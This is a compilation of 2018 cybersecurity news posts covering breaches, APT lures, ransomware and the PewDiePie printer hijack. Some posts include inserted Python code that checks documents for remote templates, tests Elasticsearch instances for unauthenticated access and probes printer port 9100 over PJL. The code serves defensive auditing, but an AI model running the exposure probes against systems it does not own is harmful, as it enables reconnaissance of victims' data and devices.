The medical industry faces an exceptional risk for cyberattacks because there are so many players involved in the sector. More than 83 percent of organizations responding to a recent survey reported making new or improved organizational security enhancements.

That’s notable progress, but analysts also worry about the potential for attacks that don’t directly target hospitals or similar organizations. Recent demonstrations from cybersecurity researchers have shown how it’s possible to hack into medical devices like pacemakers or insulin pumps.

There are also instances of hospitals being unable to perform fundamental services. In November 2018, a ransomware attack forced two hospitals to send ambulances elsewhere and only accept walk-up patients to the emergency rooms.

Hackers know they can wreak substantial havoc by attacking hospitals, thereby increasing the potential for notoriety. It doesn’t hurt that those organizations keep medical records containing valuable information hackers could sell on the black market. One incident at the North Carolina-based company Atrium Health potentially breached the data of 2.65 million people.

2. Nonprofit

Nonprofits typically focus their efforts on causes that improve society at large, at-risk groups and others in need. However, cyberattacks could thwart all those intentions to put energy toward the greater good. Research indicates cyberattacks threaten nonprofit organizations for various reasons.

Data from 2017 found only 27 percent of nonprofits broke even that year. So, if nonprofit leaders want to devote more money to cybersecurity, they may feel too financially strapped to make meaningful progress. Plus, many nonprofits have small teams of hired employees and rely heavily on volunteers otherwise. That bare-bones staffing structure could make it harder than average for nonprofits to recover after issues happen.

Also, nonprofits may feel overwhelmed about where to start as they learn about cybersecurity. Fortunately, some products geared toward nonprofits have robust integrated security. Volgistics is a company associated with volunteer management that serves 5,121 organizations. A section on its website details the online and offline measures taken to keep customer data safe.

3. Retail

The retail industry is cyclical, so certain times of the year — including the holiday season or when kids go back to school — are particularly busy. Plus, cybercrime problems could take websites offline or cause reputational damage. Despite those risks, retailers make blunders when budgeting for cybersecurity. A recent report found 50 percent of all data breaches in the U.S. happened at retail establishments.

The study also determined that entities spend the most money on cybersecurity measures considered among the least effective. No matter what, it’s crucial for the retail sector to take cybersecurity seriously. Research from Gemalto found 70 percent of people would stop doing business with companies that suffer data breaches. So, failing to conquer the problem could lead to profit losses in unexpected ways.

4. Financial Services

People rely on banks to do daily transactions for business or personal reasons. And, since financial institutions have extraordinary amounts of money on hand, it’s not surprising they’re prime targets for cybercriminals. Even financial industry businesses that don’t store so many financial resources on site — such as wealth management companies — keep documents filled with clients’ personal details.

The financial sector is also so potentially lucrative for hackers that they may set their sights on carrying out attacks on ATMs in multiple countries. Sources report a North Korean hacking group known as Lazarus is believed to be behind attacks in 23 countries totaling tens of millions of dollars.

There’s an emerging trend of banks hiring ethical hackers to find vulnerabilities and test existing safeguards. That’s a practical way to address cybercrime risks, but it’s an approach that’ll likely become increasingly harder to choose. That’s because there’s already a gigantic cybersecurity skills gap consisting of hundreds of thousands of open cybersecurity positions, and forecasts say the shortage will get worse.


No Industry Is Immune

Any sector that uses the internet to conduct business could become a cybercriminal’s target.

Although the industries mentioned here need to take particular care to prevent issues, proactive steps taken to fix problems and monitor for suspicious issues could keep all companies safer from cybercrime.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, cyberattacks)

The post 4 Industries That Have to Fight the Hardest Against Cyberattacks appeared first on Security Affairs.



Hacked Without a Trace: The Threat of Fileless Malware

Malware. The word alone makes us all cringe as we instantly relate it to something malicious happening on our computers or devices. Gone are the days when we thought the

The post Hacked Without a Trace: The Threat of Fileless Malware appeared first on The Cyber Security Place.

Quora data breach: hackers obtained information on roughly 100 million users

Another day, another illustrious victim of a data breach: the popular question-and-answer website Quora suffered a major data breach that exposed 100 million users.

On Monday, the popular question-and-answer website Quora suffered a major data breach in which unknown hackers breached its systems and accessed the data of 100 million users.

The company is notifying affected users of the incident and has reset their passwords as a precautionary measure; it also reported the breach to law enforcement. Quora hired a forensics and security firm to assist in the investigation.

Quora is still investigating the security breach; it discovered the intrusion on November 30 and attributed it to a “malicious third party.”

“We recently discovered that some user data was compromised as a result of unauthorized access to one of our systems by a malicious third party. We are working rapidly to investigate the situation further and take the appropriate steps to prevent such incidents in the future.” reads the data breach notification.

“On Friday we discovered that some user data was compromised by a third party who gained unauthorized access to one of our systems.”

Exposed data includes name, email address, hashed password, data imported from linked networks, public content and actions (e.g. questions, answers, comments, and upvotes), and non-public content and actions (e.g. answer requests, downvotes, and direct messages).

“While the passwords were encrypted (hashed with a salt that varies for each user), it is generally a best practice not to reuse the same password across multiple services, and we recommend that people change their passwords if they are doing so.” continues the company.


Data belonging to users who posted anonymously was not exposed, and financial data and social security numbers are not at risk because the Quora platform does not collect them.

Quora has identified the root cause of the breach and has taken steps to address it, but it did not disclose technical details of the incident.

The company announced additional efforts to mitigate the effects of the incident and to avoid future security breaches.

“Not all Quora users are affected, and some were impacted more than others.” states the FAQ page published by the company.

Pierluigi Paganini

(Security Affairs – Quora, Data breach)

The post Quora data breach: hackers obtained information on roughly 100 million users appeared first on Security Affairs.

Russia-linked APT Sofacy leverages BREXIT lures in recent attacks

The Russia-linked cyber-espionage group Sofacy (aka APT28, Pawn Storm, Fancy Bear, Sednit, Tsar Team, and Strontium) used BREXIT lures in recent attacks.


The APT group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU).

“As the United Kingdom (UK) Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU), iDefense analysts identified a new campaign by SNAKEMACKEREL using a BREXIT-themed lure document to deliver the Zekapab (also known as Zebrocy) first-stage malware” reads a report published by Accenture.

The Sofacy APT group has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 Presidential election.

In September 2018, security experts from ESET spotted the first UEFI rootkit ever seen in the wild; the code, tracked as LoJax, was used in attacks.

In November 2018, malware researchers at the Cybaze ZLab-Yoroi team discovered a new variant of the dangerous APT28 LoJax rootkit.

According to Accenture’s iDefense experts, on November 15 Sofacy attackers were using weaponized documents to deliver the Zebrocy backdoor.

Threat actors used the BREXIT-themed lure documents to load malicious content from an external source using the settings.xml.rels component embedded within the DOCX file.

The macro component downloaded from the external source includes a function called AutoClose(), as well as two payloads embedded as Base64-encoded strings.

Analyzing an IP address (109.248.148.42) involved in the attack, the experts discovered two different .dotm components, attachedTemplate.dotm and templates.dotm.

Both components contain the same VBA macro code, each containing two different embedded payloads: one is an executable binary file and the other is a .docm file.
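The settings.xml.rels technique described above is simple to triage offline: a DOCX is a zip archive, and the “attached template” relationship that tells Word where to fetch the template lives in word/_rels/settings.xml.rels. The following Python is an added example, not Accenture iDefense’s code. It builds a minimal document in memory from constructed XML (the hostname example.invalid, the relationship ids and the file names are placeholders, and no macro or payload is included), then reports template relationships whose target is remote rather than a template on the local disk, which is what a normal Normal.dotm reference looks like.

```python
"""Report DOCX attached-template relationships that point at a remote host.

Added example for the Sofacy/Zebrocy write-up above; not code from Accenture.
The sample documents are constructed in memory and contain no macro.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"


def classify_template_target(target: str) -> str:
    """'remote' when Word would fetch the template over the network
    (HTTP(S), FTP or a UNC path); 'local' otherwise (e.g. Normal.dotm)."""
    t = target.strip().lower()
    if t.startswith(("http://", "https://", "ftp://", "\\\\", "//")):
        return "remote"
    return "local"


def template_relationships(docx_bytes: bytes) -> List[Tuple[str, str, str]]:
    """Return (Id, Target, classification) for every attachedTemplate
    relationship in settings.xml.rels; empty when the part is absent."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if SETTINGS_RELS not in z.namelist():
            return []
        root = ET.fromstring(z.read(SETTINGS_RELS))
    found = []
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if rel.get("Type") != ATTACHED_TEMPLATE:
            continue
        target = rel.get("Target", "")
        found.append((rel.get("Id", ""), target, classify_template_target(target)))
    return found


def remote_templates(docx_bytes: bytes) -> List[str]:
    """Just the targets a defender should look at."""
    return [t for _, t, cls in template_relationships(docx_bytes) if cls == "remote"]


def build_docx(settings_rels: Optional[str]) -> bytes:
    """Constructed minimal .docx: only the parts the check needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/settings.xml", "<settings/>")
        if settings_rels is not None:
            z.writestr(SETTINGS_RELS, settings_rels)
    return buf.getvalue()


def rels_xml(target: str, mode: str = "External") -> str:
    """Constructed settings.xml.rels with a single attachedTemplate entry."""
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            f'<Relationships xmlns="{RELS_NS}">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{target}" TargetMode="{mode}"/></Relationships>')


# Constructed samples: a lure-style remote template and a normal local one.
LURE_RELS = rels_xml("http://example.invalid/templates.dotm")
BENIGN_RELS = rels_xml(
    "file:///C:/Users/user/AppData/Roaming/Microsoft/Templates/Normal.dotm")

if __name__ == "__main__":
    for label, rels in (("lure", LURE_RELS), ("benign", BENIGN_RELS)):
        print(label, template_relationships(build_docx(rels)))
```

Legitimate documents also carry an attachedTemplate relationship with TargetMode="External", so the classification keys on the target scheme rather than on the mode alone; a template pulled from a web server or a UNC share is the case worth escalating.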

“Analysis into the two binaries shows that they are in fact a Delphi (initially UPX packed) and .NET version of the Zekapab first-stage malware.” continues the report.

The malware collects system information and a list of running processes and sends the data to the command and control (C&C) server, which in turn delivers the next-stage malware if the system is deemed interesting.

Further information on the attack, including mitigation, is reported in the analysis published by Accenture.

Pierluigi Paganini

(Security Affairs – Sofacy, Brexit)

The post Russia-linked APT Sofacy leverages BREXIT lures in recent attacks appeared first on Security Affairs.


Malware since 2017: Auction giant Sotheby’s Home hit by Magecart attack

By Waqas

Sotheby’s, an American multinational corporation and Auction House has become another victim of Magecart attack after hackers gained access to Sotheby’s home website and inserted a card-skimming code aiming at customers’ credit card and banking data. Although Sotheby’s detected the intrusion on 10th October 2018 the malware was present on its website and stealing personal and financial data of […]

This is a post from HackRead.com Read the original post: Malware since 2017: Auction giant Sotheby’s Home hit by Magecart attack

What To Do When Your Social Media Account Gets Hacked

You log in to your favorite social media site and notice a string of posts or messages definitely not posted by you. Or, you get a message that your account password has been changed, without your knowledge. It hits you that your account has been hacked. What do you do?

This is a timely question considering that social media breaches have been on the rise. A recent survey revealed that 22% of internet users said that their online accounts have been hacked at least once, while 14% reported they were hacked more than once. And, earlier this year Facebook itself got hacked, exposing the identity information of 50 million users.

Your first move—and a crucial one—is to change your password right away, and notify your connections that your account has been hacked. This way your friends know not to click on any suspicious posts or messages that appear to be coming from you because they might contain malware or phishing attempts. But that’s not all. There may be other, hidden threats to having your social media account hacked.

The risks associated with a hacker poking around your social media have a lot to do with how much personal information you share. Does your account include personal information that could be used to steal your identity, or guess your security questions on other accounts?

These could include your date of birth, address, hometown, or names of family members and pets. Just remember, even if you keep your profile locked down with strong privacy settings, once the hacker logs in as you, everything you have posted is up for grabs.

You should also consider whether the password for the compromised account is being used on any of your other accounts, because if so, you should change those as well. A clever hacker could easily try your email address and known password on a variety of sites to see if they can log in as you, including on banking sites.

Next, you have to address the fact that your account could have been used to spread scams or malware. Hackers often infect accounts so they can profit off clicks using adware, or steal even more valuable information from you and your contacts.

You may have already seen the scam for “discount Ray-Ban” sunglasses that plagued Facebook a couple of years ago, and recently took over Instagram. This piece of malware posts phony ads to the infected user’s account, and then tags their friends in the post. Because the posts appear in a trusted friend’s feed, users are often tricked into clicking on it, which in turn compromises their own account.

So, in addition to warning your contacts not to click on suspicious messages that may have been sent using your account, you should flag the messages as scams to the social media site, and delete them from your profile page.

Finally, you’ll want to check to see if there are any new apps or games installed to your account that you didn’t download. If so, delete them since they may be another attempt to compromise your account.

Now that you know what to do after a social media account is hacked, here’s how to prevent it from happening in the first place.

How To Keep Your Social Accounts Secure

  • Don’t click on suspicious messages or links, even if they appear to be posted by someone you know.
  • Flag any scam posts or messages you encounter on social media to the website, so they can help stop the threat from spreading.
  • Use unique, complicated passwords for all your accounts.
  • If the site offers multi-factor authentication, use it, and choose the highest privacy setting available.
  • Avoid posting any identity information or personal details that might allow a hacker to guess your security questions.
  • Don’t log in to your social accounts while using public Wi-Fi, since these networks are often unsecured and your information could be stolen.
  • Always use comprehensive security software that can keep you protected from the latest threats.
  • Keep up to date on the latest scams and malware threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post What To Do When Your Social Media Account Gets Hacked appeared first on McAfee Blogs.

Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances

Security experts at HackenProof are warning Open Elasticsearch instances expose over 82 million users in the United States.

Experts from HackenProof discovered Open Elasticsearch instances that expose over 82 million users in the United States.

Elasticsearch is a Java-based search engine built on the free and open-source information retrieval library Lucene. It is released as open source and is used by many organizations worldwide.

Experts discovered 73 gigabytes of data during a regular security audit of publicly available servers. Using the Shodan search engine the experts discovered three IPs associated with misconfigured Elasticsearch clusters.

“A massive 73 GB data breach was discovered during a regular security audit of publicly available servers with the Shodan search engine.” reads a blog post published by HackenProof.

“Prior to this publication, there were at least 3 IPs with the identical Elasticsearch clusters misconfigured for public access.”

The first IP, discovered by the experts on November 14, contained the personal information of 56,934,021 U.S. citizens (i.e. name, email, address, state, zip, phone number, IP address, and also employer and job title).

Experts discovered a second index of the same archive that contained more than 25 million records with more detailed information (i.e. name, company details, zip address, carrier route, latitude/longitude, census tract, phone number, web address, email, employee count, revenue numbers, NAICS codes, SIC codes, etc.).


Overall, HackenProof says (PDF), 82,851,841 people were impacted by this data breach.

The overall number of records exposed in the unprotected Elasticsearch instances is 114,686,118; according to HackenProof, 82,851,841 individuals were impacted by this data leak.

At this time the ownership of the exposed Elasticsearch instances is not clear; experts speculate that Data & Leads Inc. could be the data source.

Experts attempted to notify the company of the incident, but they did not receive any reply. The company website was taken offline just after the publication of the report.

It is not possible to determine how long the data remained exposed online; the good news is that the huge trove of data is no longer available.

“While the source of the leak was not immediately identifiable, the structure of the field ‘source’ in data fields is similar to those used by a data management company Data & Leads Inc. However, we weren’t able to get in touch with their representatives.” continues the blog post.

“Moreover, shortly before this publication Data & Leads website went offline and now is unavailable.”

In September, security experts from the firm Kromtech discovered 4,000 compromised instances of the open source analytics and search tool Elasticsearch that were running PoS malware.

In early 2017, the number of internet-accessible Elasticsearch installs was roughly 35,000.

In July, the security researcher Vinny Troia discovered that Exactis, a data broker based in Palm Coast, Florida, had exposed a database that contained close to 340 million individual records on a publicly accessible server.

Unprotected Elasticsearch instances are a gift for hackers and cybercriminals: attackers can compromise them by installing malware and gain full administrative privileges on the underlying servers.
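The exposure described above, an Elasticsearch HTTP port that answers without any authentication, can be verified from the defender’s side with two requests against the hosts you administer. The following Python is an added example, not HackenProof’s tooling. It classifies the root response of an instance, and, when the instance is open, totals the document counts from the _cat/indices API to show how much data is reachable. The hostname, index names and document counts in the sample responses are constructed; check_instance is meant to be pointed at your own instances.

```python
"""Audit whether an Elasticsearch endpoint answers unauthenticated and how
many documents it exposes.

Added example for the HackenProof story above; not HackenProof's code.
The sample responses below are constructed, not captured from any host.
"""
import json
import urllib.error
import urllib.request
from typing import Dict, Optional, Tuple


def classify_response(status: int, body: str) -> str:
    """Map the response of GET / on port 9200 to a verdict.

    open_no_auth      -> 200 with Elasticsearch's banner JSON
    auth_required     -> 401/403 (security plugin or proxy in front)
    not_elasticsearch -> anything else
    """
    if status in (401, 403):
        return "auth_required"
    if status == 200:
        try:
            data = json.loads(body)
        except ValueError:
            return "not_elasticsearch"
        if isinstance(data, dict) and ("cluster_name" in data or "tagline" in data):
            return "open_no_auth"
    return "not_elasticsearch"


def exposed_documents(cat_indices_json: str) -> int:
    """Sum docs.count over GET /_cat/indices?format=json (counts are strings)."""
    total = 0
    for idx in json.loads(cat_indices_json):
        count = idx.get("docs.count")
        if count not in (None, "", "null"):
            total += int(count)
    return total


def fetch(url: str, timeout: float = 3.0) -> Tuple[int, str]:
    """GET url and return (status, body); HTTP errors are returned, not raised."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check_instance(host: str, port: int = 9200, timeout: float = 3.0) -> Dict[str, Optional[object]]:
    """Audit one instance you own: verdict plus document total when open."""
    base = f"http://{host}:{port}"
    status, body = fetch(base + "/", timeout)
    verdict = classify_response(status, body)
    docs: Optional[int] = None
    if verdict == "open_no_auth":
        status2, body2 = fetch(base + "/_cat/indices?format=json", timeout)
        if status2 == 200:
            docs = exposed_documents(body2)
    return {"host": host, "verdict": verdict, "documents": docs}


# Constructed sample responses shaped like the real APIs.
ROOT_OPEN = json.dumps({"name": "node-1", "cluster_name": "elasticsearch",
                        "version": {"number": "6.4.0"},
                        "tagline": "You Know, for Search"})
ROOT_AUTH = json.dumps({"error": {"type": "security_exception",
                                  "reason": "missing authentication credentials"}})
CAT_INDICES = json.dumps([
    {"index": "people", "docs.count": "56934021"},
    {"index": "companies", "docs.count": "25000000"},
    {"index": "empty", "docs.count": "0"},
])

if __name__ == "__main__":
    print(classify_response(200, ROOT_OPEN), exposed_documents(CAT_INDICES))
```

An instance that returns its banner JSON to an anonymous request is readable by anyone who finds it, exactly the situation the Shodan search above surfaced; binding network.host to a private address or enabling authentication in front of port 9200 is the fix.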

Pierluigi Paganini

(Security Affairs – Elasticsearch installs, hacking)

The post Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances appeared first on Security Affairs.

Security Affairs: New Zealand Security Bureau halts Spark from using Huawei 5G equipment

New Zealand’s intelligence agency asked the mobile company Spark to avoid using Huawei equipment for 5G infrastructure.

According to New Zealand’s Government Communications Security Bureau, Huawei equipment for 5G infrastructure poses a “significant network security risk,” for this reason, it asked mobile company Spark to avoid using the equipment of the Chinese company.

The announcement follows the decision of the Australian Government to ban Huawei equipment from Australia’s 5G network due to security concerns.

New Zealand is a member of the Five Eyes intelligence alliance; the other members except Canada (the UK, the US and Australia) have banned Huawei over security fears.

The Chinese company was founded by a former People’s Liberation Army official in 1987. The US was the first country to warn of the security risks associated with the use of products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with the Chinese intelligence, but it is not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei was already helping Spark to build 5G mobile networks.

“In New Zealand, Huawei has previously helped build mobile networks. In March, Spark and Huawei showcased a 5G test site across the street from the Parliament, in a publicity move that was attended by then Broadcasting Minister Clare Curran.” reported the Associated Press.

China and New Zealand have a good commercial partnership and the ban imposed by the government could have severe repercussions on it. In 2008, New Zealand signed a free-trade deal with China.

“The economic and trade cooperation between China and New Zealand is mutually beneficial in nature,” said Foreign Ministry spokesman Geng Shuang.

“We hope New Zealand will provide a level-playing field for Chinese enterprises’ operation there and do something conducive for mutual trust and cooperation.”

What is Spark’s opinion on the ban?

The company is disappointed with the decision by New Zealand’s Government Communications Security Bureau; it is doing its best to launch the 5G network by July 2020.

“Spark said it had wanted to use Huawei 5G equipment in its planned Radio Access Network, which involves technology associated with cell tower infrastructure.” concludes the AP.

“The company said it has not yet had time to review the detailed reasoning behind the spy agency’s decision, or whether it will take further steps.”

Pierluigi Paganini

(Security Affairs – New Zealand, Huawei)

The post New Zealand Security Bureau halts Spark from using Huawei 5G equipment appeared first on Security Affairs.




Hacker hijacks printers worldwide to promote popular YouTube channel

TheHackerGiraffe used the Printer Exploitation Toolkit (PRET) to hijack more than 50,000 vulnerable printers and promote the PewDiePie YouTube channel.

An anonymous hacker hijacked over 50,000 internet-connected printers worldwide to print out messages promoting the PewDiePie YouTube channel. Felix Arvid Ulf Kjellberg, aka PewDiePie, is a popular Swedish YouTuber, comedian, and video game commentator, formerly best known for his Let’s Play commentaries and now mostly known for his comedy and vlogs.

This is the latest act in the dispute over the “most-subscribed YouTube channel” crown between T-Series and PewDiePie, who currently has more than 73 million YouTube subscribers.

A hacker using the Twitter account TheHackerGiraffe decided to promote his favourite YouTube channel in his own way: he hijacked tens of thousands of printers exposed online.


The hacker used Shodan to find printers exposed online with TCP port 9100 (the raw printing port used by JetDirect-style devices) open, then sent each of them a print job carrying a message that invited the victims to unsubscribe from the T-Series channel and subscribe to PewDiePie instead.

“PewDiePie is in trouble, and he needs your help to defeat T-Series!”

“PewDiePie, the currently most subscribed to channel on YouTube, is at stake of losing his position as the number one position by an Indian company called T-Series that simply uploads videos of Bollywood trailers and campaigns,”

TheHackerGiraffe used the Printer Exploitation Toolkit (PRET) to compromise the vulnerable printers. PRET is a legitimate open-source tool developed by researchers at Ruhr-Universität Bochum in Germany for security testing of printers; it talks to the device in PostScript, PJL or PCL over the printing port, and for this kind of abuse nothing more than a reachable port 9100 is required.

The case is unusual, and it revives the discussion about the importance of properly securing Internet-connected devices.
Here the attacker merely printed a message, but printers exposed online can also serve as entry points: an attacker who compromises one can move laterally, compromise an entire network and access sensitive information.
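The check a defender would run before an attacker does, as an added example that is neither PRET nor code from the post: connect to TCP/9100, send the harmless PJL identification query `@PJL INFO ID`, and report whether the host answers like a printer. Only the Python standard library is used; the fake printer in the block is a constructed stand-in so the check can be exercised offline, and the model string it returns is made up.

```python
"""Raw-printing exposure check: does a host accept TCP/9100 and identify itself via PJL?

Added example for this post; it is not PRET and not code from the article. Only the
standard library is used. FakePrinterHandler is a constructed stand-in for a device so
the check can be exercised offline."""
import socket
import socketserver
import threading

# PJL Universal Exit Language sequence (<ESC>%-12345X) that brackets every PJL job.
UEL = b"\x1b%-12345X"
# Harmless identification query; a PJL-speaking printer answers with its model string.
PJL_INFO_ID = UEL + b"@PJL INFO ID\r\n" + UEL


def parse_pjl_info_id(raw):
    """Return the quoted model string from an '@PJL INFO ID' reply, or None."""
    lines = [ln.strip() for ln in raw.decode("ascii", errors="replace").splitlines()]
    for i, line in enumerate(lines):
        if line.startswith("@PJL INFO ID"):
            for nxt in lines[i + 1:]:
                nxt = nxt.strip("\x0c").strip().strip('"')  # reply ends with a form feed
                if nxt:
                    return nxt
    return None


def probe_raw_port(host, port=9100, timeout=3.0):
    """Classify one host:
    ('closed', None)  nothing accepts the connection
    ('open', None)    something listens but does not answer PJL
    ('open', model)   the device identified itself, i.e. anyone can submit jobs to it"""
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return ("closed", None)
    chunks = []
    with sock:
        try:
            sock.sendall(PJL_INFO_ID)
            while True:
                data = sock.recv(1024)
                if not data:
                    break
                chunks.append(data)
                if b"\x0c" in data:
                    break
        except OSError:  # includes socket.timeout: treat a silent peer as non-PJL
            pass
    return ("open", parse_pjl_info_id(b"".join(chunks)))


class FakePrinterHandler(socketserver.BaseRequestHandler):
    """Constructed stand-in for a JetDirect-style printer: answers INFO ID, and
    would put any other job on paper (here: stdout)."""
    MODEL = b'"Constructed LaserJet (fake)"'

    def handle(self):
        job = self.request.recv(4096)
        if b"@PJL INFO ID" in job:
            self.request.sendall(b"@PJL INFO ID\r\n" + self.MODEL + b"\r\n\x0c")
        else:
            print("fake printer would print:", job.decode("ascii", "replace"))


class SilentHandler(socketserver.BaseRequestHandler):
    """A listener on 9100 that is not a PJL device (or swallows the job)."""

    def handle(self):
        self.request.recv(4096)


def start_fake_printer(handler=FakePrinterHandler):
    """Serve the fake device on an ephemeral loopback port; returns (server, port)."""
    server = socketserver.TCPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def free_loopback_port():
    """A loopback port nothing listens on (bound, then released), for the closed case."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    server, port = start_fake_printer()
    print(probe_raw_port("127.0.0.1", port))                  # ('open', 'Constructed LaserJet (fake)')
    print(probe_raw_port("127.0.0.1", free_loopback_port()))  # ('closed', None)
    server.shutdown()
```

Run `probe_raw_port` over your own external address ranges to find the printers Shodan would find. Any host that comes back as `('open', model)` accepts print jobs from the whole Internet with the same connection that identified it, which is all the PewDiePie stunt needed; the fix is to keep port 9100 off the Internet edge and restrict it to the print servers on the LAN.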

Don’t forget that every device in your organization that is exposed online enlarges your attack surface.

Pierluigi Paganini

(Security Affairs – vulnerable printers, hacking)

The post Hacker hijacks printers worldwide to promote popular YouTube channel appeared first on Security Affairs.

Security Affairs: Moscow’s New Cable Car closed due to a ransomware infection

Two days after Moscow opened a new cable car system, hackers infected its computer systems with ransomware.

The cable car is over 700 meters long and spans the Moscow River, linking the Luzhniki Olympic Complex to the observation platform on Sparrow Hills.

Two days after the cable car opened, the servers of the Moscow Ropeway (MKD), the organization that operates the infrastructure, were infected with ransomware, and the attackers demanded payment in Bitcoin.

The infection occurred on Wednesday, November 28, at around 14:00 local time, according to local news outlets.

“One day after opening to the general public, Moscow’s highly touted first-ever cable car was forced to shut down after a reported cyberattack.” reported The Moscow Times.

“However, a cyberattack forced all passengers to disembark the cable car only two hours after it opened, its operator said on Wednesday.”

A video on the website of the government daily Rossiiskaya Gazeta showed a police officer explaining to people waiting in line that the cable car would not reopen “for technical reasons.”

On November 29, MKD staff removed the malware from its systems, and on November 30 the cable car service resumed.

“Since November 30, 2018, the Moscow Ropeway (MKD) has been operating normally.

On November 29, 2018, the MKD officers diagnosed all the systems that ensure the safe operation of the cableway as part of test activities for the launch of the road.” states the announcement on the MKD website.

Russian police have identified the hacker who carried out the ransomware attack, and a criminal case has been opened into the attack on the Moscow cable car server.

“The Nikulinsky inter-district prosecutor’s office recognized as lawful and justified the initiation of criminal proceedings by the investigative bodies of the Moscow police under Part 1 of Article 273 of the Criminal Code of the Russian Federation (“Creation, use and distribution of malicious computer programs”) into the cyber attack on the Moscow cableway server,” said Lyudmila Nefedova of the metropolitan prosecutor’s office.

This is not the first time that public transportation has been affected by ransomware. In November 2016, hackers crashed the computer system of the San Francisco Municipal Railway (Muni), took the ticket kiosks offline and gave riders a free ride for an entire day.

Pierluigi Paganini

(Security Affairs – ransomware, Moscow cable car)

The post Moscow’s New Cable Car closed due to a ransomware infection appeared first on Security Affairs.

Hackers Could Exploit A Zoom App Vulnerability To Disrupt Conferences

Customers of the Zoom conferencing app need to update their apps as soon as possible to protect themselves from hackers. As

Hackers Could Exploit A Zoom App Vulnerability To Disrupt Conferences on Latest Hacking News.

Security Affairs: Security Affairs newsletter Round 191 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Very trivial Spotify phishing campaign uncovered by experts
·      Experts found a new powerful modular Linux cryptominer
·      Hacker stole $1m from Silicon Valley executive via SIM swap
·      Linux Kernel is affected by two DoS vulnerabilities still unpatched
·      Ransomware attack disrupted emergency rooms at Ohio Hospital System
·      When Do You Need to Report a Data Breach?
·      Experts demonstrate how to exfiltrate data using smart bulbs
·      Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins
·      The SLoad Powershell malspam is expanding to Italy
·      UK Parliament seized confidential Facebook docs to investigate its data protection policies.
·      British MP: Facebook was aware about Russian activity at least since 2014
·      FBI along with security firms dismantled 3ve Ad Fraud Operation
·      Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again
·      Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach
·      AccuDoc Data Breach impacted 2.6 Million Atrium Health patients
·      Dell data breach – Dell forces password reset after the incident
·      Dissecting the Mindscrew-Powershell Obfuscation
·      Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers
·      U.S. DoJ charges Iranian duo over SamSam Ransomware activity
·      327 million Marriott guests affected in Starwood Data Breach
·      New PowerShell-based Backdoor points to MuddyWater
·      ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools
·      MITRE evaluates Enterprise security products using the ATT&CK Framework


Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 191 – News of the week appeared first on Security Affairs.

Massive Marriott Breach Underscores Risk of overlooking Data Liability

The Marriott breach underscores how companies fail to price in the risk of poor data security. In the age of GDPR, that could be an expensive failure. 

The post Massive Marriott Breach Underscores Risk of overlooking Data Liability appeared first on The Security Ledger.


Security Affairs: ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools

Over 270,000 connected devices run vulnerable implementations of UPnP, and threat actors are attempting to recruit them into a multi-purpose botnet.

In April, Akamai reported that threat actors had compromised 65,000 home routers by exploiting vulnerabilities in Universal Plug and Play (UPnP); the experts tracked the botnet as UPnProxy. Now the company has provided an update to its initial analysis, revealing a disconcerting scenario: UPnProxy is still up and running.

The UPnP protocol is widely adopted even though its implementations have long been known to be vulnerable. In early 2013, researchers at Rapid7 published a whitepaper entitled “Security Flaws in Universal Plug and Play” that evaluated the global exposure of UPnP-enabled network devices.

The report highlighted that over 23 million IPs running the Portable UPnP SDK were vulnerable to remote code execution through a single UDP packet, and that over 6,900 product versions from over 1,500 vendors were vulnerable because their UPnP SOAP service was exposed to the Internet.

UPnP allows the automated negotiation and configuration of port opening and forwarding within a NATed network; by abusing the protocol, attackers can control the traffic in and out of the network.

The botnet uncovered by Akamai is composed of vulnerable devices into which malicious NAT port-mapping entries have been injected; the injections turn the routers into proxies, which is why the experts called the injected devices UPnProxy.

Experts recommend that users install router updates and patched firmware to mitigate the threat. According to Akamai, many UPnP vulnerabilities remain unpatched: out of a pool of 3.5 million potentially vulnerable routers, 277,000 were still open to UPnProxy and 45,000 had been compromised.

